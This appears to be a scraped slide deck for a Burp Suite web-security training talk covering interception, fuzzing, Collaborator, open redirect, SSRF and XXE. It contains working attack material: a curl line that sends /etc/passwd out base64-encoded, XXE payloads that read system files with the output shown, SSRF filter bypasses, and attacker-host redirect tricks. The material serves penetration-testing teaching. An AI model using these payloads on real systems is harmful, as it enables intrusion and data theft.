![Fuzzing Hidden Files and Dias
• Fuzz for directories
• Fuzz inside directory by [fuzz].[ext]
• Fuzz inside directory by [fuzz]
• Fuzz web service methods by [fuzz]
• Let’s hack :)
23](https://image.slidesharecdn.com/burpsuite-200621134505/85/Burp-suite-23-320.jpg)
![Burp Collaborator
• It provides an address
• [unique].burpcollaborator.net
• zpsh3143whnrugrsbrjkadsa016suh.burpcollaborator.net
• The burpcollaborator.net domain might be filtered
• Can be used to steal information
• curl domain.tld -d "`cat /etc/passwd | base64 -w 0`”
• nslookup [hexdata].domain.tld
28](https://image.slidesharecdn.com/burpsuite-200621134505/85/Burp-suite-28-320.jpg)
![Vulnerable REGEX
• (Server side) Steps to redirect
• Extracting the host from URL
• Checking the host by whitelist
• Permission of the redirect
• Can you spot the vulnerability?
• https?://(www.)?(?P<host>[a-z0-9.-_]*)(/.*)?
36](https://image.slidesharecdn.com/burpsuite-200621134505/85/Burp-suite-36-320.jpg)
![Bypass Filters 1
• Internal IP address filters
• Using domain instead of IP address
• The xip.io is a magic DNS server
• dig A 10.0.0.1.xip.io
• dig A anything.10.0.0.1.xip.io
• dig A 1ynrnhl.xip.io (base32(int(‘254.169.254.169’)))
• Open Redirect in white-listed domains
• Alternate IP addresses:
• 127.1 or 0x7F000001
• http://[::1]/ or http://[::]/
50](https://image.slidesharecdn.com/burpsuite-200621134505/85/Burp-suite-50-320.jpg)
![XML External Entity
POST /endpoint HTTP/1.1
<foo>
Hello World
</foo>
HTTP/1.1 200 OK
Hello World
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World">
]>
<foo>
Hello &bar;
</foo>
HTTP/1.1 200 OK
Hello World
57](https://image.slidesharecdn.com/burpsuite-200621134505/85/Burp-suite-57-320.jpg)
![XML External Entity
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
HTTP/1.0 200 OK
root:x:0:0:root:/root:/
bin/bash
daemon:x:1:1:daemon:/usr/
sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
59](https://image.slidesharecdn.com/burpsuite-200621134505/85/Burp-suite-59-320.jpg)
![PHP Wrappers
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
&bar;
</foo>
HTTP/1.0 200 OK
IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0g
aW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3R...
60](https://image.slidesharecdn.com/burpsuite-200621134505/85/Burp-suite-60-320.jpg)
Burp suite
- 2. 2 Who am I? • Bug hunter • Security consultant • 10+ years experience • My virtual home: https://memoryleaks.ir/ • Twitter: Voorivex 2
- 3. BurpSuite • BurpSuite 2.x • Cross platform (Java) • Nice suite for perform vulnerability assessment • Configurable and extendable 3
- 5. Dashboard • Automated operations: • Crawl (known as spider in BurpSuite 1.x) • Crawl and Audit (Active scan) • User-driven operations: • Active scan • Passive scan • Passive crawl 5
- 6. Target • Site map • Useful to find dir, files and execution paths • Scope • https://site.com/solid • https://site.com/.* • https://site.com/path/.* 6
- 7. Proxy • Most useful option • Not only a proxy, but interceptor • All requests and responses can be intercepted • Useful to find out the workflows 7
- 8. How to intercept the HTTPs traffic? 8
- 9. HTTP(s) Traffic BurpSuite Proxy Target HTTP(s) Traffic HTTP(s) Traffic HTTP(s) TrafficModify User 9
- 10. HTTP Strict Transport Security • Web security mechanism to prevent • Man in the middle attack • Visiting site by HTTP • Visiting site by invalid certificate • Since the BurpSuite does MITM, HSTS stops it 10
- 11. How to remove HSTS • Exporting and installing Burp’s CA certificate • Demo time :) 11
- 12. HOL - Inappropriate error handling • Searching through the logs • Watching the responses carefully • Chasing the responses • Let’s hack :) 12
- 13. HOL - Execution after Redirect • JavaScript redirects are not safe • Browsers always follow the redirects • But attackers not • Ignoring redirects and retrieving sensitive content • Searching through the logs • Let’s hack :) 13
- 14. Removing Tools Signature • Tools produce signatures • The BurpSuite can be in the middle to • Capturing the tool/script traffic • Modifying the traffic • Removing signatures 14
- 16. Repeater • It repeats the requests • Manipulating and reissuing HTTP and WebSocket messages • Good choice to discover IDOR 16
- 17. Insecure Direct Object Reference • Direct access to objects based on user-supplied input • http://foo.bar/somepage?invoice=12345 • User ID in JSON/XML formats • Downloading a file by the name • Let’s see a case • https://hackerone.com/reports/287789 17
- 18. Backend Server Login Information Information API Call + user_id user_id API Call + user_id Information UserAttacker 18
- 19. Intruder • Automating customized attacks against web applications • Extremely powerful and configurable • Brute-force guessing • Fuzzing dir, files and paths • Exploiting blind SQLi (here) • Multi thread, delay, payloads and etc 19
- 20. Intruder Options • Burp’s intruder has several options, use • Sniper to fuzz a single input • Battering ram to custom attacks • Pitchfork for leaked credentials • Cluster bomb for separated lists • Demo time :) 20
- 21. Powerful Payloads • Get powerful lists: • Seclist - (here) • PayloadsAllTheThings - (here) • Bo0om fuzz - (here) • Make custom lists 21
- 22. Conducting a Brute Force • Get a username list • Get a password list • Brute force and endpoint to find valid credentials • Let’s hack :) 22
- 23. Fuzzing Hidden Files and Dias • Fuzz for directories • Fuzz inside directory by [fuzz].[ext] • Fuzz inside directory by [fuzz] • Fuzz web service methods by [fuzz] • Let’s hack :) 23
- 24. Fuzzing Vague Values • Some websites have vague values • Base64 inputs • Hash inputs • There are several processor for payloads • Let’s hack :) 24
- 25. Burp Collaborator • A network service to discover vulnerabilities • It captures Out of Band (OOB) requests • HTTP(s) requests • DNS lookups • Uses a valid, CA-signed, wildcard TLS certificate • Useful to find SSRF, XXE, blind XSS and etc 25
- 26. HTTP(s) Traffic Application DNS or HTTP User Check Response Data 26
- 27. How to send data out of the server through HTTP/DNS? 27
- 28. Burp Collaborator • It provides an address • [unique].burpcollaborator.net • zpsh3143whnrugrsbrjkadsa016suh.burpcollaborator.net • The burpcollaborator.net domain might be filtered • Can be used to steal information • curl domain.tld -d "`cat /etc/passwd | base64 -w 0`” • nslookup [hexdata].domain.tld 28
- 29. Sequencer • Analyzing the quality of randomness • Application's session tokens • Anti-CSRF tokens • Password reset tokens • Demo time :) 29
- 30. Insufficient Entropy • Using sequencer to find insufficient entropy • Let’s hack :) 30
- 31. Extender • To extend Burp's functionality using third-party code • Languages: Python, Ruby and Java • There are good plugins, such as Active Scan++ • Demo time :) 31
- 32. Options • There are some useful options • Upstream or Socks proxy are good • Demo time :) 32
- 33. Open Redirect 33
- 34. Open Redirect • Known as Unvalidated Redirects and Forwards • Redirect a user to a website without any validation • Exploit? Depending on the architecture of website • https://site.tld/r?URI=https%3A%2F%2Fwww.google.com • Usually URI parameter is protected by a REGEX • The REGEX should not be vulnerable :) 34
- 35. How SSO and oAuth bleed? • Open Redirect :) 35
- 36. Vulnerable REGEX • (Server side) Steps to redirect • Extracting the host from URL • Checking the host by whitelist • Permission of the redirect • Can you spot the vulnerability? • https?://(www.)?(?P<host>[a-z0-9.-_]*)(/.*)? 36
- 37. Case Study 37
- 38. Time to Hack :) • It’s time to hack :) 38
- 40. Introduction • The ability to create requests from the vulnerable server to intra/internet • Interacting to: • Cloud server meta-data • Database HTTP interfaces • Internal REST interfaces • Reading files • Scanning internal IP/Port 40
- 41. Example 41
- 42. Web Server Web Server Direct request is 1 2 3 4 42
- 44. Attack Example • The code is vulnerable to SSRF • Normal usage: • https://site.com/?url=index • Attack vector: • https://site.com/?url=http://127.0.0.1:9200/ • https://site.com/?url=http://127.0.0.1:8080/manager/ 44
- 45. Various Schemes • Protocols can extent the attack surface of SSRF • Example: • https://site.com/?url=file:///etc/passwd • https://site.com/?url=dict://localhost:3779/ 45
- 46. Schemes • Protocols can extent the attack surface of SSRF • file:/// -> Allows an attacker to fetch the content of a file on the server • dict:// -> Used to refer to word lists available using the DICT protocol • sftp:// -> Used for secure file transfer over secure shell • ldap:// -> Lightweight Directory Access Protocol • tftp:// -> Trivial File Transfer Protocol, works over UDP • gopher:// -> designed for distributing, searching, and retrieving documents • http:// -> Used to fetch any content from the web • https:// -> Same as the http 46
- 47. Detection • Listen a common port in the server • Put the https://ip in the URL-like inputs 47
- 48. Filters • Some filters forbid: • Sending requests to internal IP addresses • Changing URL scheme • Sending requests to Not white-listed domains • https?://(www.)?domain.com/.+ • https?://.+?.?domain.com/.+ 48
- 49. Time to Hack :) • It’s time to hack :) 49
- 50. Bypass Filters 1 • Internal IP address filters • Using domain instead of IP address • The xip.io is a magic DNS server • dig A 10.0.0.1.xip.io • dig A anything.10.0.0.1.xip.io • dig A 1ynrnhl.xip.io (base32(int(‘254.169.254.169’))) • Open Redirect in white-listed domains • Alternate IP addresses: • 127.1 or 0x7F000001 • http://[::1]/ or http://[::]/ 50
- 51. Bypass Filters 2 • Scheme filters • Can by bypassed by server-side redirect: • https://domain.tld/?url=https://attacker.tld/r.php • r.php contents: 51
- 52. Bypass Filters 3 • White-listed domain filter • Open Redirect vulnerability • https://domain.tld/?url=https://sub.domain.tld/? next=https://attacker.com 52
- 53. Trick • A magic inputs: • Url = https://user@evil.com@domain.tld/ • curl url -> request to evil.com • (php) parse_url(url) -> host: domain.tld • Example: • https://fireshellsecurity.team/sunshinectf-search- box/ 53
- 55. XML External Entity • XML (Extensible Markup Language) is a very popular data format. • Some applications use the XML format to transmit data between the browser and the server. • Altering XML may lead to XXE • XXE allows an attacker to interfere with an application's processing of XML data. • XML specification contains various potentially dangerous features. 55
- 56. Saving the XML File Response Parsing the XML File Web Service Backend Server 56
- 57. XML External Entity POST /endpoint HTTP/1.1 <foo> Hello World </foo> HTTP/1.1 200 OK Hello World POST /endpoint HTTP/1.1 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY bar "World"> ]> <foo> Hello &bar; </foo> HTTP/1.1 200 OK Hello World 57
- 58. XML External Entity • It seems harmless? • XML parsers are configured to process external entities • System identifier: is a document-processing construct • There are two identifiers in XML: • Public • System • A SYSTEM identifier specifies the exact location of file 58
- 59. XML External Entity POST /endpoint HTTP/1.1 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo> &xxe; </foo> HTTP/1.0 200 OK root:x:0:0:root:/root:/ bin/bash daemon:x:1:1:daemon:/usr/ sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh (...) 59
- 60. PHP Wrappers POST /endpoint HTTP/1.1 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY bar SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/fstab"> ]> <foo> &bar; </foo> HTTP/1.0 200 OK IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0g aW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3R... 60
- 61. XML External Entity • Attackers are not limited to system files • Some XML parsers, it’s even possible to get directory listings • Attackers can also send HTTP(s) requests by • http:// • https:// • gopher:// • dict:// 61
- 62. Directory Listing • Some parsers allow directory listing in XXE • <!ENTITY % file SYSTEM “file:///etc/“> 62
- 63. More Scenarios • Many applications support a “File Upload” functionality • XLSX, DOCX, PPTX, SVG or any XML MIME type formats • The application processes files • These files have an XML MIME type • An attacker could take advantage of the XML • root-me.org, SamBox-v3 is a good example 63